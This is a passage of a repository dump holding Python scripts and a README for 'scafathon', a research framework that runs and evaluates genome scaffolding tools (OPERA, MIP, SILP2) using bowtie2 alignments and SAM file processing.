coverage of a contig is higher than\n# (repeat threshold * average coverage), then it is considered as repeat\nrepeat_threshold=1.5\n\n# Contig size threshold (default=500): Opera will not use the contigs whose length\n# is shorter than this value\ncontig_size_threshold=10\n\n#----------------------------------------------------------------------------------------------\n#\n# Library parameters.\n#\n\n[LIB]\ncalculate_ori=no\nread_ori=in\nmap_type=bowtie\ncalculate_lib=no\nlib_mean=${lib_mean}\nlib_std=${lib_std}\ncluster_threshold=${pet_size}\nmap_file=${opera_edge_file}\n\"\"\"\n txt = string.Template(txt)\n txt = txt.substitute(opera_results_dir=results_dir, opera_node_file=ctg_fasta, opera_edge_file=edge_file, pet_size=bundle_size, lib_mean=ins_size, lib_std=std_dev)\n\n # write to file.\n fout = open(config_file, \"wb\")\n fout.write(txt)\n fout.close()\n\n\ndef prep_mip(work_dir, ant_dir, prep_sh, ctg_fasta, read1_sam, read2_sam, ins_size, std_dev, bundle_size, pair_mode, args):\n \"\"\" mip scaffolder \"\"\"\n\n # simplify files.\n ant_dir = '/dev/null'\n pre_sh = prep_sh\n\n contig_file = ctg_fasta\n test1 = read1_sam\n test2 = read2_sam\n \n # sanity.\n if os.path.isfile(test1) == False or os.path.isfile(test2) == False:\n logging.error(\"missing file:\")\n logging.error(test1)\n logging.error(test2)\n \n # mip specific files.\n SAM_1_MOD = \"%s/sam_1.sam\" % work_dir\n SAM_2_MOD = \"%s/sam_2.sam\" % work_dir\n MERGED_FILE = \"%s/merged\" % work_dir\n MERGED1_FILE = \"%s/merged.sorted1\" % work_dir\n MERGED2_FILE = \"%s/merged.sorted2\" % work_dir\n FILTERED_FILE = \"%s/filtered.txt\" % work_dir\n COV_FILE = \"%s/coverage.txt\" % work_dir\n PARAM_FILE = \"%s/parameters.txt\" % work_dir\n MIP_FILE = \"%s/scaffolds2.txt\" % work_dir\n\n # modify SAM file to be happy with MIP.\n fin1 = open(test1, \"rb\")\n fin2 = open(test2, \"rb\")\n fout1 = open(SAM_1_MOD, \"wb\")\n fout2 = open(SAM_2_MOD, \"wb\")\n for line1 in fin1:\n line2 = fin2.readline()\n \n # tokenize.\n tokens1 = line1.strip().split(\"\\t\")\n tokens2 = line2.strip().split(\"\\t\")\n \n # change naming convention.\n tokens1[0] = tokens1[0].replace(\"/1\",\"_R3\")\n tokens2[0] = tokens2[0].replace(\"/2\",\"_F3\")\n \n # modify orientation.\n if pair_mode == 'rf':\n if tokens1[1] == \"0\":\n tokens1[1] = \"16\"\n else:\n tokens1[1] = \"0\"\n else:\n print pair_mode\n logging.error('un-written')\n sys.exit(1)\n \n \n # write it back out.\n fout1.write('\\t'.join(tokens1) + '\\n')\n fout2.write('\\t'.join(tokens2) + '\\n')\n\n fin1.close() \n fin2.close() \n fout1.close() \n fout2.close() \n\n PROG_1 = \"/opt/mip/scripts/merge.sh\"\n PROG_2 = \"/opt/mip/scripts/filter-mappings.sh\"\n PROG_3 = \"/home/jrl03001/code/ScafValidate/mip/contig_coverage.py\"\n #'''\n # merge data.\n with open(pre_sh, 'wb') as fout:\n \n # prepare.\n fout.write('#!/bin/bash\\n')\n cmd = [PROG_1, SAM_2_MOD, SAM_1_MOD, MERGED_FILE]\n fout.write(' '.join(cmd) + '\\n')\n cmd = [PROG_2, MERGED1_FILE, MERGED2_FILE, FILTERED_FILE]\n fout.write(' '.join(cmd) + '\\n')\n cmd = [\"python\", PROG_3, contig_file, COV_FILE, SAM_1_MOD, SAM_2_MOD]\n fout.write(' '.join(cmd) + '\\n')\n \n # run it.\n subprocess.call([\"chmod\", \"u+x\", pre_sh])\n if subprocess.call([pre_sh], cwd=work_dir) != 0:\n logging.error(\"couldn't prepare MIP\")\n sys.exit(1)\n\n #'''\n # write the config.\n txt = '''# Upper bound for genome length (required)\ngenome_length=5000000000\n\n#parameter specifications for the first stage\n[STAGE]\n# Maximum biconnected component size. 
(optional)\n#maximum_biconnected_component=50\n# Maximum allowed degree in scaffolding graph. (optional)\nmaximum_degree=50\n# Maximum coverage for nonrepetitive contig. (optional)\n#maximum_coverage=100\n# The maximum overlap between contigs that is allowed without checking for\n# sequence similarity. By default this is set based on the variablility in\n# insert size lengths of each library. (optional)\n#maximum_overlap=100\n# The minimum support for an edge. (optional)\nminimum_support=%i\n# Should edges with negative estimated distance be checked for sequence\n# similarity or removed automatically? (optional)\ncheck_negative_edges=1\n\n# library specification for the first stage\n[LIBRARY]\n# File in SAM format containing mappings for the mate pair reads\n# to the contigs\nmappings=%s\n# Orientation of the mate pairs (in current version must be SOLID)\norientation=SOLID\n# Insert length\ninsert_length=%i\n# Minimum insert length\nmin_insert_length=%i\n# Maximum insert length\nmax_insert_length=%i\n''' % (bundle_size, FILTERED_FILE, ins_size, (ins_size - (3*std_dev)), (ins_size + (3*std_dev)))\n\n \n # write to file.\n fout = open(PARAM_FILE, \"wb\")\n fout.write(txt)\n fout.close()\n" }, { "alpha_fraction": 0.7733333110809326, "alphanum_fraction": 0.7787878513336182, "avg_line_length": 48.93939208984375, "blob_id": "e3a5c0f43aac28f5cb51851c0920604634639204", "content_id": "14d1bf9b18bb635859d30bb1b62a69d27e2d9e97", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1650, "license_type": "permissive", "max_line_length": 233, "num_lines": 33, "path": "/README.md", "repo_name": "jim-bo/scafathon", "src_encoding": "UTF-8", "text": "scafathon\n=========\n\n**Genome scaffolding comparison framework**\n\n\n## Overview\nScafathon is just a collection of scripts used to evaluate three genome scaffolding tools; SILP2, OPERA and MIP. It should be easy to extend this framework to add more tools. It relies on Quast for alignment based accuracy assesment.\n\n***Warning: This code is only intended for use by professionals. Modification of the source code is required to set proper paths to external executables. Furthermore adding additional scaffolding tools requires manual coding.***\n\n## Usage\nThe tool is divided up into several sub-programs which need to be run in-order. Use the \"-h\" argument after each of the following sub-commands for a description of their usage.\n```python\npython silp.py [sub-command] -h\n```\n1. *align:* aligns the paired reads (required bowtie2) installed\n2. *pair:* pairs two existing SAM files\n3. *meta_combine:* combines two pairs of SAM files at different percentages [metagenomic simulations]\n4. *prep:* prepares selected scaffold algorithm by running all preprocessing code\n5. *run:* runs scaffolding tool\n6. *sim_eval:* evaluates scaffold if there exists a reference AGP with locations of each contig\n7. *real_eval:* uses alignment based accuracy metrics\n\n## Installation\nThis is primarily a python program, it relies on several python packages:\n* numpy\n* networkx\n\nAlso several seperate packages are required. These include nucmer, quast and [parabio](https://github.com/jim-bo/parabio).\n\n## Disclaimer\nThis is a research tool written in a research enviroment. No support is offered and bugs may be present. Only one library size is support at this time. 
\n\n" }, { "alpha_fraction": 0.4289953410625458, "alphanum_fraction": 0.4340822398662567, "avg_line_length": 25.505617141723633, "blob_id": "b981c7a67de36752d838201660e7edad35900281", "content_id": "fd5e0fa3b08a8602cfa93f7b9fc56904188bc8a3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2359, "license_type": "permissive", "max_line_length": 67, "num_lines": 89, "path": "/utils/misc.py", "repo_name": "jim-bo/scafathon", "src_encoding": "UTF-8", "text": "import subprocess\nimport os\nimport numpy as np\n\nagp_dt = np.dtype([\\\n ('scaf_name', 'S255'),\\\n ('scaf_start', np.long),\\\n ('scaf_stop', np.long),\\\n ('scaf_idx', np.long),\\\n ('comp_type', 'S50'),\\\n ('comp_name', 'S255'),\\\n ('comp_start', np.long),\\\n ('comp_stop', np.long),\\\n ('comp_orien', np.long),\\\n ('comp_linkage', np.long),\\\n])\n\n\ndef runit(job, path):\n \"\"\" runs the job \"\"\"\n with open(path, 'wb') as fout:\n fout.write('\\n'.join(job))\n subprocess.call(['chmod', 'a+x', path])\n subprocess.call(['bash', path])\n\ndef create_dir(dir_path):\n ''' creates directory if necessary'''\n if os.path.isdir(dir_path) == False:\n if subprocess.call([\"mkdir\", dir_path]) != 0:\n logging.error(\"couldn't make dir\")\n sys.exit(1)\n\n\n\ndef save_agps(agp_file, agp):\n ''' saves agp to disk.'''\n\n # write to file.\n fout = open(agp_file, \"w\")\n\n # write each entry.\n z = len(agp_dt.names)\n for i in range(agp.size):\n\n # sanity skip.\n if agp[i]['scaf_name'] == \"\":\n continue\n\n # format result.\n tmp = agp[i]\n if tmp['comp_type'] == \"W\":\n # get orientation.\n if tmp[\"comp_orien\"] == 0:\n o = \"+\"\n else:\n o = \"-\"\n\n # write contig.\n txt = str(tmp['scaf_name']) + \"\\t\"\n txt += str(tmp['scaf_start']) + \"\\t\"\n txt += str(tmp['scaf_stop']) + \"\\t\"\n txt += str(tmp['scaf_idx']) + \"\\t\"\n txt += str(tmp['comp_type']) + \"\\t\"\n txt += str(tmp['comp_name']) + \"\\t\"\n txt += str(tmp['comp_start']) + \"\\t\"\n txt += str(tmp['comp_stop']) + \"\\t\"\n txt += o + \"\\n\"\n\n else:\n # get linkage.\n if tmp['comp_linkage'] == 0:\n o = \"no\"\n else:\n o = \"yes\"\n\n # write gap.\n txt = str(tmp['scaf_name']) + \"\\t\"\n txt += str(tmp['scaf_start']) + \"\\t\"\n txt += str(tmp['scaf_stop']) + \"\\t\"\n txt += str(tmp['scaf_idx']) + \"\\t\"\n txt += str(tmp['comp_type']) + \"\\t\"\n txt += str(tmp['comp_stop'] - tmp['comp_start']) + \"\\t\"\n txt += str(tmp['comp_name']) + \"\\t\"\n txt += o + \"\\n\"\n\n fout.write(txt)\n\n # close file.\n fout.close()\n" }, { "alpha_fraction": 0.5159717202186584, "alphanum_fraction": 0.5442575216293335, "avg_line_length": 23.1235294342041, "blob_id": "b480607bf84c02ee5083aaa1ddb0970b00cae73c", "content_id": "d0f3285b47682ee4eb2c1e9f9ed79e596c539994", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8202, "license_type": "permissive", "max_line_length": 105, "num_lines": 340, "path": "/utils/align.py", "repo_name": "jim-bo/scafathon", "src_encoding": "UTF-8", "text": "'''\nalignment utility functions\n'''\nimport os\nimport sys\nimport subprocess\nimport logging\nimport mmap\nfrom operator import itemgetter\nimport numpy as np\n\n## public functions ##\ndef create_idx(asm_fasta, index_file):\n \"\"\" make bowtie2 index\n Parameters:\n -----------\n asm_fasta : str\n index_file : str\n \"\"\"\n\n # run the command.\n subprocess.call(['bowtie2-build', '-f', asm_fasta, index_file])\n\ndef create_aln(size_file, index_file, fastq_file, 
sam_file, ant_dir, num_cpu):\n \"\"\" make bowtie2 alignment and\n pull out multimappers/\n Parameters:\n -----------\n index_file : str\n fastq_file : str\n \"\"\"\n\n # create sizes.\n sizes = dict()\n with open(size_file, \"rb\") as fin:\n lines = fin.readlines()\n for line in lines:\n sz, name = line.strip().split()\n sz = int(sz)\n sizes[name] = sz\n\n # create the annotation arrays.\n annotes = dict()\n for ref in sizes:\n annotes[ref] = np.zeros(sizes[ref], dtype=np.int)\n\n # create alignment command.\n cmd = ['bowtie2','--reorder', '-k', '10', '-q','-p',str(num_cpu), '-x', index_file, '-U', fastq_file]\n\n # call the command and pipe output.\n output = subprocess.Popen(cmd, stdout=subprocess.PIPE)\n\n # open single-sam file.\n sam_out = open(sam_file, \"wb\")\n\n # loop over each alignment.\n for status, line in _extract_sam(output):\n\n # dump good ones.\n if status == True:\n sam_out.write(line)\n continue\n\n # record location of baduns.\n tokens = line.strip().split()\n start = int(tokens[3])\n stop = start + len(tokens[9])\n rname = tokens[2]\n\n # annotate that.\n annotes[rname][start:stop] += 1\n\n # close output.\n sam_out.close()\n\n # serialize multimap.\n for ref in annotes:\n\n # create name.\n fname = '%s/%s.npy' % (ant_dir, ref)\n\n # look for existing.\n if os.path.isfile(fname):\n tmp = np.load(fname)\n annotes[ref] = annotes[ref] + tmp\n\n # serialize it.\n np.save(fname, annotes[ref])\n\ndef pair_sam(sam_in_1, sam_in_2, sam_out_1, sam_out_2, key_size):\n \"\"\" pairs SAM files \"\"\"\n\n # memory map the SAM files1.\n fin1 = open(sam_in_1, \"r+\")\n fin2 = open(sam_in_2, \"r+\")\n\n map1 = mmap.mmap(fin1.fileno(), 0, access=mmap.ACCESS_COPY)\n map2 = mmap.mmap(fin2.fileno(), 0, access=mmap.ACCESS_COPY)\n\n # create lists from data.\n hitlist1 = list()\n hitlist2 = list()\n for p1, p2 in _sam_gen(map1, map2, key_size):\n hitlist1.append(p1)\n hitlist2.append(p2)\n\n # seek files bake to begining.\n map1.seek(0)\n map2.seek(0)\n\n # sort lists by name, reverse so we can pop from end.\n hitlist1.sort(key=itemgetter(1), reverse=True)\n hitlist2.sort(key=itemgetter(1), reverse=True)\n\n # open output files.\n fout1 = open(sam_out_1, \"wb\")\n fout2 = open(sam_out_2, \"wb\")\n\n # generator of pairs.\n for p1, p2 in _pair_gen(hitlist1, hitlist2):\n\n # load sam info from map.\n map1.seek(p1[0])\n map2.seek(p2[0])\n\n # write out info.\n fout1.write(map1.readline())\n fout2.write(map2.readline())\n\n # close output files.\n fout1.close()\n fout2.close()\n\n # close memmory mapped files.\n map1.close()\n map2.close()\n\n fin1.close()\n fin2.close()\n\n\ndef pair_sam2(sam_in_1, sam_in_2, sam_out_1, sam_out_2, key_size):\n \"\"\" pairs SAM files \"\"\"\n\n # memory map the first SAM file.\n logging.info(\"opening memory map files\")\n\n # build name arrays.\n logging.info(\"extracting name array 1\")\n id1 = _extract_names(sam_in_1, key_size)\n logging.info(\"extracting name array 2\")\n id2 = _extract_names(sam_in_2, key_size)\n\n # sort the names and copy.\n logging.info(\"sorting name array 1\")\n srt1 = np.sort(id1[:]['name'])\n logging.info(\"sorting name array 2\")\n srt2 = np.sort(id2[:]['name'])\n\n # compute unique in each pair.\n logging.info(\"unique 1\")\n uq1 = _numpy_unique(srt1)\n logging.info(\"unique 2\")\n uq2 = _numpy_unique(srt2)\n\n # compute the intersection of unique.\n logging.info(\"intersection\")\n valid_list = np.intersect1d(uq1, uq2, assume_unique=True)\n\n # sanity check.\n assert len(valid_list) != 0, 'cant have no valid stuff'\n\n # create a 
set.\n logging.info(\"set\")\n valid = set(list(valid_list))\n\n # write the entries.\n logging.info(\"writing\")\n _write_valid(sam_in_1, id1, valid, sam_out_1)\n _write_valid(sam_in_2, id2, valid, sam_out_2)\n logging.info(\"done\")\n\n\n## internal functions ##\n\ndef _write_valid(sam_in_1, id1, valid, sam_out_1):\n \"\"\" writes entries from valid set\"\"\"\n\n # open output.\n fout1 = open(sam_out_1, \"wb\")\n fin1 = open(sam_in_1, \"rb\")\n\n # generator of pairs.\n idx = 0\n for line in fin1:\n\n # operate.\n if id1[idx]['name'] in valid:\n fout1.write(line)\n\n # udpate\n idx += 1\n\n # close em.\n fout1.close()\n fin1.close()\n\ndef _numpy_unique(srt1):\n \"\"\" return unique subset\"\"\"\n\n # create mask.\n good = np.zeros(srt1.shape[0], dtype=np.bool)\n good[:] = False\n\n # iterate over non-boundry cases.\n for i in range(1, srt1.shape[0]-1):\n\n # must not match its neighbors.\n if srt1[i-1] != srt1[i] and srt1[i+1] != srt1[i]:\n good[i] = True\n\n # check the first one.\n if srt1[0] != srt1[1]:\n good[0] = True\n\n # check the last one.\n if srt1[-1] != srt1[-2]:\n good[-1] = True\n\n # return the subset slice.\n return srt1[good]\n\n\ndef _extract_names(file_name, key_size):\n \"\"\" builds numpy array of name hits\"\"\"\n\n # count lines.\n with open(file_name, \"rb\") as fin:\n line_cnt1 = 0\n for line in fin:\n line_cnt1 += 1\n\n # allocate array.\n id1 = np.zeros(line_cnt1, dtype=np.dtype([('name','S25'),('row',np.int)]))\n\n # copy data into array.\n with open(file_name, \"rb\") as fin:\n\n idx = 0\n for line1 in fin:\n # operate.\n if key_size == 0:\n id1[idx]['name'] = line1.split(\"\\t\")[0]\n else:\n id1[idx]['name'] = line1.split(\"\\t\")[0][0:-key_size]\n id1[idx]['row'] = idx\n\n # reset.\n idx += 1\n\n # return the array.\n return id1\n\ndef _extract_sam(output):\n ''' extracts output form SAM'''\n\n # extract unique to file, save multimap annotations.\n for line in iter(output.stdout.readline,''):\n\n # skip header.\n if line[0] == '@': continue\n\n # split.\n tokens = line.strip().split()\n\n # check for no align.\n if tokens[2] == '*':\n continue\n\n # check for MAPQ > 2:\n if int(tokens[4]) < 2:\n yield False, line\n else:\n # its good, yield it.\n yield True, line\n\n\ndef _sam_gen(map1, map2, key_size):\n '''yields the SAM name and the line index'''\n\n # loop till end of file.\n line1 = map1.readline()\n line2 = map2.readline()\n pos1 = 0\n pos2 = 0\n while line1 != '' and line2 != '':\n\n # process it.\n tok1 = line1.strip().split()\n tok2 = line2.strip().split()\n\n # remove to key.\n if key_size != 0:\n key1 = tok1[0][0:-key_size]\n key2 = tok2[0][0:-key_size]\n else:\n key1 = tok1[0]\n key2 = tok2[0]\n\n # yield the name and line number.\n yield (pos1, key1), (pos2, key2)\n\n # update info.\n pos1 += len(line1)\n pos2 += len(line2)\n line1 = map1.readline()\n line2 = map2.readline()\n\ndef _pair_gen(hitlist1, hitlist2):\n ''' does an in-order walk to find pairs '''\n\n # loop till each list is empty.\n while len(hitlist1) > 0 and len(hitlist2) > 0:\n\n # peek for a match.\n if hitlist1[-1][1] == hitlist2[-1][1]:\n\n # yield it.\n yield hitlist1[-1], hitlist2[-1]\n\n # change left.\n hitlist1.pop()\n\n else:\n\n # pop smaller.\n if hitlist1[-1][1] < hitlist2[-1][1]:\n hitlist1.pop()\n else:\n hitlist2.pop()\n" } ]
7
BlackCyn/IshmuratovDaniilVTIP2
https://github.com/BlackCyn/IshmuratovDaniilVTIP2
f7d237be831eb04edbd2aff9b4768d42de7f2cbb
e7cc19f8ad1290ce18e1eab959f8bc96ec794c5a
fb27a87d3666efc19b484a9b300f6df8b2c96527
refs/heads/main
2023-01-10T09:59:35.243515
2020-11-15T05:48:46
2020-11-15T05:48:46
312,966,508
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5271122455596924, "alphanum_fraction": 0.5526931881904602, "avg_line_length": 23.463302612304688, "blob_id": "ec18c590bd8cdc02b3766648520b18353a848259", "content_id": "8f11df4364c75d0d8c0d3fa6d59ac03cacb53b95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6570, "license_type": "no_license", "max_line_length": 100, "num_lines": 218, "path": "/ВТИП2.py", "repo_name": "BlackCyn/IshmuratovDaniilVTIP2", "src_encoding": "UTF-8", "text": "#Сортировка выборкой\r\ndef selection(numbers): \r\n # i = количеству отсортированных значений\r\n for i in range(len(numbers)):\r\n # Исходно считаем наименьшим первый элемент\r\n lowest = i\r\n # Этот цикл перебирает несортированные элементы\r\n for j in range(i + 1, len(numbers)):\r\n if numbers[j] < numbers[lowest]:\r\n lowest = j\r\n # меняем самый маленький элемент в списке на самый первый\r\n numbers[i], numbers[lowest] = numbers[lowest], numbers[i]\r\n\r\n# Проверка\r\nnumb = [4, 2, 55, 123, 22] \r\nselection(numb) \r\nprint(\"Массив, отсортированный выборкой\", numb)\r\n\r\n\r\n\r\n#Пузырьковая сортировка\r\ndef bubble(numbers): \r\n # Присваиваем переменной switch, чтобы цикл запустился хотя бы один раз\r\n switch = True\r\n while switch:\r\n switch = False\r\n for i in range(len(numbers) - 1):\r\n if numbers[i] > numbers[i + 1]:\r\n # Меняем элементы \r\n numbers[i], numbers[i + 1] = numbers[i + 1], numbers[i]\r\n # Устанавливаем switch в True для следующей итерации\r\n switch = True\r\n\r\n# Проверка\r\nnumb = [4, 2, 55, 123, 22] \r\nbubble(numb) \r\nprint(\"Массив, отсортированный методом пузырька\", numb)\r\n\r\n\r\n\r\n#Сортировка вставками\r\ndef insertion(numbers): \r\n for i in range(1, len(numbers)):\r\n item_to_insert = numbers[i]\r\n # Ссылку на индекс предыдущего элемента сохраняем\r\n j = i - 1\r\n # Элементы отсортированного сегмента перемещаем вперёд, если они больше элемента для вставки\r\n while j >= 0 and numbers[j] > item_to_insert:\r\n numbers[j + 1] = numbers[j]\r\n j -= 1\r\n # Вставляем элемент\r\n numbers[j + 1] = item_to_insert\r\n\r\n# Проверка\r\nnumb = [4, 2, 55, 123, 22] \r\ninsertion(numb) \r\nprint(\"Массив, отсортированный методом вставки\", numb)\r\n\r\n\r\n\r\n#Пирамидальная сортировка\r\ndef heapify(numbers, size, index): \r\n # Индекс наибольшего элемента считаем корневым индексом\r\n largest = index\r\n left = (2 * index) + 1\r\n right = (2 * index) + 2\r\n\r\n if left < size and numbers[left] > numbers[largest]:\r\n largest = left\r\n\r\n if right < size and numbers[right] > numbers[largest]:\r\n largest = right\r\n\r\n if largest != index:\r\n numbers[index], numbers[largest] = numbers[largest], numbers[index]\r\n heapify(numbers, size, largest)\r\n\r\ndef heap_sort(nums): \r\n n = len(nums)\r\n\r\n # Создаём Max Heap из списка\r\n for i in range(n, -1, -1):\r\n heapify(nums, n, i)\r\n\r\n # Перемещаем корень Max Heap в конец списка\r\n for i in range(n - 1, 0, -1):\r\n nums[i], nums[0] = nums[0], nums[i]\r\n heapify(nums, i, 0)\r\n\r\n# Проверка\r\nnumb = [4, 2, 55, 123, 22] \r\nheap_sort(numb) \r\nprint(\"Массива отсортированный пирамидальным методов\", numb)\r\n\r\n\r\n\r\n#Быстрая сортировка\r\ndef split(numbers, low, high): \r\n # Cредний элемент выбираем в качестве опорного\r\n\r\n pivot = numbers[(low + high) // 2]\r\n i = low - 1\r\n j = high + 1\r\n while True:\r\n i += 1\r\n while numbers[i] < pivot:\r\n i += 1\r\n\r\n j -= 1\r\n while numbers[j] > pivot:\r\n j -= 1\r\n\r\n if i >= j:\r\n return j\r\n\r\n # Если левый от 
опорного элемента больше чем правый, меняем их местаими\r\n numbers[i], numbers[j] = numbers[j], numbers[i]\r\n\r\ndef quick1(numbers): \r\n def quick2(items, low, high):\r\n if low < high:\r\n index = split(items, low, high)\r\n quick2(items, low, index)\r\n quick2(items, index + 1, high)\r\n\r\n quick2(numbers, 0, len(numbers) - 1)\r\n\r\n# Проверка\r\nnumb = [4, 2, 55, 123, 22] \r\nquick1(numb) \r\nprint(\"Массив, отсортированный методом быстрой сортировки\", numb) \r\n\r\n\r\n\r\n#Сортировка методом слияния\r\ndef merge(left, right): \r\n sorted = []\r\n left_index = right_index = 0\r\n\r\n left_length, right_length = len(left), len(right)\r\n\r\n for _ in range(left_length + right_length):\r\n if left_index < left_length and right_index < right_length:\r\n # Сравниваем первые элементы в начале каждого списка\r\n\r\n if left[left_index] <= right[right_index]:\r\n sorted.append(left[left_index])\r\n left_index += 1\r\n else:\r\n sorted.append(right[right_index])\r\n right_index += 1\r\n\r\n elif left_index == left_length:\r\n sorted.append(right[right_index])\r\n right_index += 1\r\n\r\n elif right_index == right_length:\r\n sorted.append(left[left_index])\r\n left_index += 1\r\n\r\n return sorted\r\n\r\ndef merge_sort(numbers): \r\n\r\n if len(numbers) <= 1:\r\n return numbers\r\n \r\n mid = len(numbers) // 2\r\n\r\n left = merge_sort(numbers[:mid])\r\n right = merge_sort(numbers[mid:])\r\n\r\n return merge(left, right)\r\n\r\n# Проверка\r\nnumb = [4, 2, 55, 123, 22] \r\nnumb = merge_sort(numb) \r\nprint(\"Массив, отсортированный методом слияния\", numb)\r\n\r\n\r\n\r\n\r\nimport math \r\ndef my_sin (x,n): \r\n x = x/180*math.pi \r\n q = x\r\n s = 0 \r\n for i in range(1, n+1):\r\n s = s+ q\r\n q = q* (-1) * (x*x) / ((2*i+1) * (2*i)) \r\n return s \r\n\r\n\r\n\r\n\r\n\r\ndef f(x):\r\n return 2.718281828459045**(1+x)\r\ndef tailor(x, eps):\r\n x = 1+x\r\n sum = 1+x\r\n term = x;\r\n n = 2;\r\n while term*term > eps*eps:\r\n term *= x/n\r\n n += 1\r\n sum += term\r\n return sum\r\n\r\na=3.0\r\nb=4.0\r\nkrok=(b-a)/10\r\n\r\nwhile a<=b: \r\n print(round(a,2), end=' ')\r\n print(round(f(a),5),end=' ')\r\n print(round(tailor(a,1e-6),5))\r\n a+=krok\r\n" } ]
1
smitthakkar96/Punchit.io_website_master
https://github.com/smitthakkar96/Punchit.io_website_master
94f38b11e93739fc48c9f511fd128530af1f6eba
008dae83b389b5a09b30f882df9ef52d4017be16
d4a619b5f11fcfd48d0e73dfc4556476f8c6ba09
refs/heads/master
2023-01-05T16:48:02.772822
2016-03-05T05:08:49
2016-03-05T05:08:49
50,392,439
1
1
null
2016-01-26T00:58:00
2016-01-30T03:26:11
2022-12-26T20:00:23
JavaScript
[ { "alpha_fraction": 0.642259418964386, "alphanum_fraction": 0.6861924529075623, "avg_line_length": 94.80000305175781, "blob_id": "459f25a606d0475450b932ac225ab8020b90df56", "content_id": "e061ccb507e037405840d580e127ab29a9c6d9ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 478, "license_type": "no_license", "max_line_length": 380, "num_lines": 5, "path": "/images/logos/punchit.io_files/DdQOHnWx7V2.js", "repo_name": "smitthakkar96/Punchit.io_website_master", "src_encoding": "UTF-8", "text": "/*!CK:97048086!*//*1441684666,*/\n\nif (self.CavalryLogger) { CavalryLogger.start_js([\"TVKMf\"]); }\n\n__d('PaymentTokenProxyUtils',['URI'],function a(b,c,d,e,f,g,h){if(c.__markCompiled)c.__markCompiled();var i={getURI:function(j){var k=new h('/ajax/payment/token_proxy.php').setDomain(window.location.hostname).setProtocol('https').addQueryData(j),l=k.getDomain().split('.');if(l.indexOf('secure')<0){l.splice(1,0,'secure');k.setDomain(l.join('.'));}return k;}};f.exports=i;},null);" }, { "alpha_fraction": 0.5920848250389099, "alphanum_fraction": 0.6048547625541687, "avg_line_length": 26.922222137451172, "blob_id": "7b89cc119595c869b8d3d935d866cf4801dae8b8", "content_id": "3a10b86cb962cf4308c5a09caef0200b16692f38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 27643, "license_type": "no_license", "max_line_length": 168, "num_lines": 990, "path": "/js/controllers.js", "repo_name": "smitthakkar96/Punchit.io_website_master", "src_encoding": "UTF-8", "text": "var app = angular.module('app.controllers',[]);\n\napp.filter('unique', function() {\n return function(collection, keyname) {\n var output = [],\n keys = [];\n\n angular.forEach(collection, function(item) {\n var key = item[keyname];\n if(keys.indexOf(key) === -1) {\n keys.push(key);\n output.push(item);\n }\n });\n\n return output;\n };\n});\n\napp.controller('myCtrl',['$scope','$http','Model',function($scope,$http,Model) {\n\t$scope.text = \"ddd\";\n\t// $scope.Data = Data\n\tParse.initialize(\"Y4Txek5e5lKnGzkArbcNMVKqMHyaTk3XR6COOpg4\", \"fR1P17QhE9b7PKOa1wXozi0yo8IAlYLSIzqYh4EU\");\n\t$http.get('/GetSessionToken')\n\t.then(function(response) {\n\t\t// console.log(response.data);\n\tParse.User.become(response.data)\n\t})\n\tvar current_user = Parse.User.current()\n\t$scope.Name = current_user.get(\"Ninja_name\")\n\t$scope.ProfilePicture_url = current_user.get(\"ProfilePicture\").url();\n\t\t$scope.logout = function() {\n\t\t\t// console.log(\"clicked\")\n\t\t\t\t$http({\n\t\t\t\t\tmethod: 'GET',\n\t\t\t\t\t\turl: '/logout'\n\t\t\t\t\t\t}).then(function successCallback(response) {\n\t\t\t\t\t\t}, function errorCallback(response) {\n\t\t\t\t\t\t// called asynchronously if an error occurs\n\t\t\t\t\t\t// or server returns response with an error status.\n\t\t\t\t\t});\n\t};\n\t$scope.$watch('Value',function(){\n\t\t\tModel.Value = $scope.Value\n\t},true)\n\t}])\n\napp.controller('bodyCtrl',function($scope,$http,PostService,Model,Search) {\n\tPusher.log = function(message) {\n\t\tif (window.console && window.console.log) {\n\t\t\twindow.console.log(message);\n\t\t}\n\t};\n try{\n\t var newPunches = document.getElementById('newPunches')\n\tnewPunches.style.display = 'none'\n}\ncatch(e)\n{\n\n}\n\tvar pusher = new Pusher('2f8f1cab459e648a27fd', {\n\t\tencrypted: true\n\t});\n\tvar channel = pusher.subscribe('PostChannel');\n\tchannel.bind('NewUpdate', function(data) {\n\tvar prom = 
PostService.GetSinglePost(data.message)\n\tprom.then(function(newPost){\n\t\t// console.log(JSON.stringify(newPost));\n\t\tArray.prototype.insert = function (index, item) {\n\t\t this.splice(index, 0, item);\n\t\t};\n\t\tvar newPunches = document.getElementById('newPunches')\n\t\tnewPunches.style.display = 'block'\n // unshift(Data[0])\n // ($scope.$$phase || $scope.$root.$$phase) ? unshift() : $scope.$apply(unshift);\n $scope.posts.unshift(newPost)\n //console.log($scope.posts);\n })\n\t})\n if(location.href.split('/').indexOf(\"share\") != -1)\n {\n var objectId = location.href.split('/')[location.href.split('/').indexOf(\"share\") + 1]\n //console.log(objectId);\n var myprom = PostService.GetSinglePost(objectId)\n myprom.then(function(Data){\n // console.log(JSON.stringify(Data));\n // unshift(Data[0])\n $scope.SinglePost = Data[0]\n //console.log($scope.posts);\n })\n }\n\n\tfunction detectmob() {\n\t if( navigator.userAgent.match(/Android/i)\n\t || navigator.userAgent.match(/webOS/i)\n\t || navigator.userAgent.match(/iPhone/i)\n\t || navigator.userAgent.match(/iPad/i)\n\t || navigator.userAgent.match(/iPod/i)\n\t || navigator.userAgent.match(/BlackBerry/i)\n\t || navigator.userAgent.match(/Windows Phone/i)\n\t ){\n\t return true;\n\t }\n\t else {\n\t return false;\n\t }\n\t}\n\tvar url = document.URL\n\tif(url.indexOf(\"Posts\")!=-1)\n\t{\n\t\tvar objectId = url.split('/')[2];\n\t\tvar SinglePostPromise = PostService.GetSinglePost(\"8pzy70zCXr\")\n\t\tSinglePostPromise.then(function(Data){\n\t\t\t$scope.SinglePost = Data[0]\n\t\t})\n\t}\n\t$scope.Enter = function(isChecked){\n\t\tif(isChecked)\n\t\t{\n\t\t\t$scope.PostComment();\n\t\t}\n\t}\n\tif(detectmob())\n\t{\n\t\t$scope.width = \"100%\";\n\t}\n\telse 